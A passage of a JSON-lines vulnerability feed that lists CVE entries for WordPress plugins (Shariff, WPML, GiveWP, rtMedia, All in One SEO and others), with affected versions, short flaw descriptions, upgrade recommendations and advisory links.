version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4f0deb68-3caf-4ad6-977e-0e954d29e6b7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4f0deb68-3caf-4ad6-977e-0e954d29e6b7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3108077\\\/wp-google-map-plugin\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3108077\\\/wp-google-map-plugin\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4672","slug":"wordpress-simple-paypal-shopping-cart","versionEndExcluding":"4.6.2","description":"The WordPress Simple Shopping Cart WordPress plugin before 4.6.2 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6500271f-9d1c-40ed-be58-a6cea8d1110d\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6500271f-9d1c-40ed-be58-a6cea8d1110d\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5939","slug":"buddypress-media","versionImpact":"4.6.15","versionEndExcluding":"4.6.16","description":"The rtMedia for WordPress, BuddyPress and bbPress WordPress plugin before 4.6.16 loads the contents of the import file in an unsafe manner, leading to remote code execution by privileged users.","recommendation":"Update to version 4.6.16, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/db5d41fc-bcd3-414f-aa99-54d5537007bc\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/db5d41fc-bcd3-414f-aa99-54d5537007bc\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5931","slug":"buddypress-media","versionImpact":"4.6.15","versionEndExcluding":"4.6.16","description":"The rtMedia for WordPress, BuddyPress and bbPress WordPress plugin before 4.6.16 does not validate files to be uploaded, which could allow attackers with a low-privilege account (e.g. subscribers) to upload arbitrary files such as PHP on the server","recommendation":"Update to version 4.6.16, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3d6889e3-a01b-4e7f-868f-af7cc8c7531a\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3d6889e3-a01b-4e7f-868f-af7cc8c7531a\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-41951","slug":"buddypress-media","versionImpact":"4.6.14","versionEndExcluding":"4.6.15","description":"Missing Authorization vulnerability in rtCamp rtMedia for WordPress, BuddyPress and bbPress allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects rtMedia for WordPress, BuddyPress and bbPress: from n\/a through 4.6.14.","recommendation":"Update to version 4.6.15, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/buddypress-media\\\/vulnerability\\\/wordpress-rtmedia-for-wordpress-buddypress-and-bbpress-plugin-4-6-14-broken-access-control-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/buddypress-media\\\/vulnerability\\\/wordpress-rtmedia-for-wordpress-buddypress-and-bbpress-plugin-4-6-14-broken-access-control-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2695","slug":"shariff","versionImpact":"4.6.13","versionEndExcluding":"4.6.14","description":"The Shariff Wrapper plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'shariff' shortcode in all versions up to, and including, 4.6.13 due to insufficient input sanitization and output escaping on user supplied attributes such as 'borderradius' and 'timestamp'. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.6.14, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9baa8bbf-a318-4bc5-8bfd-2bd64536965e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9baa8bbf-a318-4bc5-8bfd-2bd64536965e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3069111%40shariff%2Ftrunk&old=3061040%40shariff%2Ftrunk&sfp_email=&sfph_mail=#file1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3069111%40shariff%2Ftrunk&old=3061040%40shariff%2Ftrunk&sfp_email=&sfph_mail=#file1\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4098","slug":"shariff","versionImpact":"4.6.13","versionEndExcluding":"4.6.14","description":"The Shariff Wrapper plugin for WordPress is vulnerable to Local File Inclusion in versions up to, and including, 4.6.13 via the shariff3uu_fetch_sharecounts function. This allows unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","recommendation":"Update to version 4.6.14, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f49fba00-c576-4a1a-8b0b-9ebed3e3d090?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f49fba00-c576-4a1a-8b0b-9ebed3e3d090?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shariff\\\/trunk\\\/shariff.php#L410\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shariff\\\/trunk\\\/shariff.php#L410\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3103137\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3103137\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6386","slug":"sitepress-multilingual-cms","versionImpact":"4.6.12","versionEndExcluding":"4.6.13","description":"The WPML plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 4.6.12 via the Twig Server-Side Template Injection. This is due to missing input validation and sanitization on the render function. This makes it possible for authenticated attackers, with Contributor-level access and above, to execute code on the server.","recommendation":"Update to version 4.6.13, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f7fc91cc-e529-4362-8269-bf7ee0766e1e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f7fc91cc-e529-4362-8269-bf7ee0766e1e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpml.org\\\/\",\"name\":\"https:\\\/\\\/wpml.org\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/sec.stealthcopter.com\\\/wpml-rce-via-twig-ssti\\\/\",\"name\":\"https:\\\/\\\/sec.stealthcopter.com\\\/wpml-rce-via-twig-ssti\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1106","slug":"shariff","versionEndExcluding":"4.6.10","description":"The Shariff Wrapper WordPress plugin before 4.6.10 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0672f8af-33e2-459c-ac8a-7351247a8a26\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0672f8af-33e2-459c-ac8a-7351247a8a26\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3554","slug":"all-in-one-seo-pack","versionImpact":"4.6.0","versionEndExcluding":"4.6.1.1","description":"The All in One SEO \u2013 Best WordPress SEO Plugin \u2013 Easily Improve SEO Rankings & Increase Traffic plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 4.6.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.6.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/28741ffc-4ff5-4e67-a183-bb5064b6752e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/28741ffc-4ff5-4e67-a183-bb5064b6752e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3073370%40all-in-one-seo-pack%2Ftrunk&old=3064696%40all-in-one-seo-pack%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3073370%40all-in-one-seo-pack%2Ftrunk&old=3064696%40all-in-one-seo-pack%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3368","slug":"all-in-one-seo-pack","versionImpact":"4.6.0","versionEndExcluding":"4.6.1.1","description":"The All in One SEO  WordPress plugin before 4.6.1.1 does not validate and escape some of its Post fields before outputting them back, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","recommendation":"Update to version 4.6.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ab78b1a5-e28c-406b-baaf-6d53017f9328\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ab78b1a5-e28c-406b-baaf-6d53017f9328\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3175","slug":"chatbot","versionEndExcluding":"4.6.1","description":"The AI ChatBot WordPress plugin before 4.6.1 does not adequately escape some settings, allowing high-privilege users such as admin to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7643980b-eaa2-45d1-bd9d-9afae0943f43\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7643980b-eaa2-45d1-bd9d-9afae0943f43\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6813","slug":"auth0","versionImpact":"4.6.0","versionEndExcluding":"4.6.1","description":"The Login by Auth0 plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018wle\u2019 parameter in all versions up to, and including, 4.6.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 4.6.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0c4e0d48-fde1-45dd-8e06-4582cf677579?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0c4e0d48-fde1-45dd-8e06-4582cf677579?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3114611%40auth0&new=3114611%40auth0&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3114611%40auth0&new=3114611%40auth0&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5644","slug":"tournamatch","versionImpact":"4.6.0","versionEndExcluding":"4.6.1","description":"The Tournamatch WordPress plugin before 4.6.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 4.6.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/afe14c7a-95b2-4d3f-901a-e53ecef70d49\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/afe14c7a-95b2-4d3f-901a-e53ecef70d49\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5627","slug":"tournamatch","versionImpact":"4.6.0","versionEndExcluding":"4.6.1","description":"The Tournamatch WordPress plugin before 4.6.1 does not sanitise and escape some parameters, which could allow users with a role as low as subscriber to perform Cross-Site Scripting attacks.","recommendation":"Update to version 4.6.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5b18dc3d-0d5f-44e9-b22f-48ea0a9c9193\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5b18dc3d-0d5f-44e9-b22f-48ea0a9c9193\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8620","slug":"give","versionImpact":"4.6.0","versionEndExcluding":"4.6.1","description":"The GiveWP \u2013 Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 4.6.0. This makes it possible for unauthenticated attackers to extract donor names, emails, and donor id.","recommendation":"Update to version 4.6.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/impress-org\\\/givewp\\\/issues\\\/8042\",\"name\":\"https:\\\/\\\/github.com\\\/impress-org\\\/givewp\\\/issues\\\/8042\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3336253%40give&new=3336253%40give&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3336253%40give&new=3336253%40give&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.linkedin.com\\\/posts\\\/givewp_givewp-support-handpicked-from-the-best-activity-7356319738290974720-Dt4U\\\/?utm_source=share&utm_medium=member_desktop&rcm=ACoAABmBk5UBxPIzCp0cgsD1_1xKASTMphetnI4\",\"name\":\"https:\\\/\\\/www.linkedin.com\\\/posts\\\/givewp_givewp-support-handpicked-from-the-best-activity-7356319738290974720-Dt4U\\\/?utm_source=share&utm_medium=member_desktop&rcm=ACoAABmBk5UBxPIzCp0cgsD1_1xKASTMphetnI4\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6dc7c5a6-513e-4aa8-9538-0ac6fb37c867?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6dc7c5a6-513e-4aa8-9538-0ac6fb37c867?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12308","slug":"logo-slider-wp","versionImpact":"4.5.0","versionEndExcluding":"4.6.0","description":"The Logo Slider  WordPress plugin before 4.6.0 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"Update to version 4.6.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fa82ada7-357b-4f01-a0d6-ff633b188a80\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fa82ada7-357b-4f01-a0d6-ff633b188a80\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7205","slug":"give","versionImpact":"4.5.0","versionEndExcluding":"4.6.0","description":"The GiveWP \u2013 Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the donor notes parameter in all versions up to, and including, 4.5.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with GiveWP worker-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Additionally, they need to trick an administrator into visiting the legacy version of the site.","recommendation":"Update to version 4.6.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/trunk\\\/src\\\/API\\\/REST\\\/V3\\\/Routes\\\/Donors\\\/DonorNotesController.php#51\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/trunk\\\/src\\\/API\\\/REST\\\/V3\\\/Routes\\\/Donors\\\/DonorNotesController.php#51\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3333090\\\/give\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3333090\\\/give\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/39e501d8-88a0-4625-aeb0-aa33fc89a8d4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/39e501d8-88a0-4625-aeb0-aa33fc89a8d4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1076","slug":"ssl-zen","versionImpact":"4.5.0","versionEndExcluding":"4.6.0","description":"The SSL Zen  WordPress plugin before 4.6.0 only relies on the use of .htaccess to prevent visitors from accessing the site's generated private keys, which allows an attacker to read them if the site runs on a server who doesn't support .htaccess files, like NGINX.","recommendation":"Update to version 4.6.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9c3e9c72-3d6c-4e2c-bb8a-f4efce1371d5\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9c3e9c72-3d6c-4e2c-bb8a-f4efce1371d5\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3118","slug":"export-all-urls","versionEndExcluding":"4.6","description":"The Export All URLs WordPress plugin before 4.6 does not sanitise and escape a parameter before outputting them back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8a9efc8d-561a-42c6-8e61-ae5c3be581ea\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8a9efc8d-561a-42c6-8e61-ae5c3be581ea\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4270","slug":"woo-min-max-quantity-step-control-single","versionEndExcluding":"4.6","description":"The Min Max Control WordPress plugin before 4.6 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/04560bf1-676b-46fb-9344-4150862f2686\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/04560bf1-676b-46fb-9344-4150862f2686\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6722","slug":"bitfire","versionImpact":"4.5","versionEndExcluding":"4.6","description":"The BitFire Security \u2013 Firewall, WAF, Bot\/Spam Blocker, Login Security plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.5 via the bitfire_* directory that automatically gets created and stores potentially sensitive files without any access restrictions. This makes it possible for unauthenticated attackers to extract sensitive data from various files like config.ini, debug.log, and more.","recommendation":"Update to version 4.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3334399%40bitfire&new=3334399%40bitfire&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3334399%40bitfire&new=3334399%40bitfire&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3335461%40bitfire&new=3335461%40bitfire&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3335461%40bitfire&new=3335461%40bitfire&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/72320980-733d-4fe6-9a13-39c476b77298?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/72320980-733d-4fe6-9a13-39c476b77298?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1861","slug":"antihacker","versionImpact":"4.52","versionEndExcluding":"4.53","description":"The Disable Json API, Login Lockdown, XMLRPC, Pingback, Stop User Enumeration Anti Hacker Scan plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the antihacker_truncate_scan_table() function in all versions up to, and including, 4.52. This makes it possible for authenticated attackers, with subscriber-level access and above, to truncate the scan table.","recommendation":"Update to version 4.53, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b80c8888-e8d6-4458-ae93-8e4182060590?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b80c8888-e8d6-4458-ae93-8e4182060590?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3040447%40antihacker&new=3040447%40antihacker&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3040447%40antihacker&new=3040447%40antihacker&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11088","slug":"simple-membership","versionImpact":"4.5.5","versionEndExcluding":"4.5.6","description":"The Simple Membership plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.5.5 via the WordPress core search feature. This makes it possible for unauthenticated attackers to extract sensitive data from posts that have been restricted to higher-level roles such as administrator.","recommendation":"Update to version 4.5.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3190023\\\/simple-membership\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3190023\\\/simple-membership\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c1558b08-a33b-4cf2-bacb-c88065f513cc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c1558b08-a33b-4cf2-bacb-c88065f513cc?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2811","slug":"chatbot","versionEndExcluding":"4.5.6","description":"The AI ChatBot WordPress plugin before 4.5.6 does not sanitise and escape numerous of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks to all admin when setting chatbot and all client when using chatbot","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/82a81721-0435-45a6-bd5b-dc90186cf803\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/82a81721-0435-45a6-bd5b-dc90186cf803\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2742","slug":"chatbot","versionEndExcluding":"4.5.5","description":"The AI ChatBot WordPress plugin before 4.5.5 does not sanitize and escape its settings, allowing high-privilege users such as admin to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f689442a-a851-4140-a10c-ac579f9da142\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f689442a-a851-4140-a10c-ac579f9da142\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1381","slug":"wp-meta-seo","versionEndExcluding":"4.5.5","description":"The WP Meta SEO WordPress plugin before 4.5.5 does not validate image file paths before attempting to manipulate the image files, leading to a PHAR deserialization vulnerability. Furthermore, the plugin contains a gadget chain which may be used in certain configurations to achieve remote code execution.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f140a928-d297-4bd1-8552-bfebcedba536\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f140a928-d297-4bd1-8552-bfebcedba536\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.wpscan.com\\\/uncovering-a-phar-deserialization-vulnerability-in-wp-meta-seo-and-escalating-to-rce\\\/\",\"name\":\"https:\\\/\\\/blog.wpscan.com\\\/uncovering-a-phar-deserialization-vulnerability-in-wp-meta-seo-and-escalating-to-rce\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-54676","slug":"meeting-scheduler-by-vcita","versionImpact":"4.5.3","versionEndExcluding":"4.5.5","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in vcita Online Booking & Scheduling Calendar for WordPress by vcita allows Stored XSS. This issue affects Online Booking & Scheduling Calendar for WordPress by vcita: from n\/a through 4.5.3.","recommendation":"Update to version 4.5.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/meeting-scheduler-by-vcita\\\/vulnerability\\\/wordpress-online-booking-scheduling-calendar-for-by-vcita-plugin-plugin-4-5-3-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/meeting-scheduler-by-vcita\\\/vulnerability\\\/wordpress-online-booking-scheduling-calendar-for-by-vcita-plugin-plugin-4-5-3-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12710","slug":"wp-appbox","versionImpact":"4.5.3","versionEndExcluding":"4.5.4","description":"The WP-Appbox plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 4.5.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 4.5.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/wp-appbox\\\/tags\\\/4.5.3&new_path=\\\/wp-appbox\\\/tags\\\/4.5.4&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/wp-appbox\\\/tags\\\/4.5.3&new_path=\\\/wp-appbox\\\/tags\\\/4.5.4&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/101451de-1ed4-4717-86c5-a41feafd4c7e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/101451de-1ed4-4717-86c5-a41feafd4c7e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2255","slug":"essential-blocks","versionImpact":"4.5.3","versionEndExcluding":"4.5.4","description":"The Essential Blocks \u2013 Page Builder Gutenberg Blocks, Patterns & Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's widgets in all versions up to, and including, 4.5.2 due to insufficient input sanitization and output escaping on user supplied attributes such as listStyle. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.5.4, or a newer patched 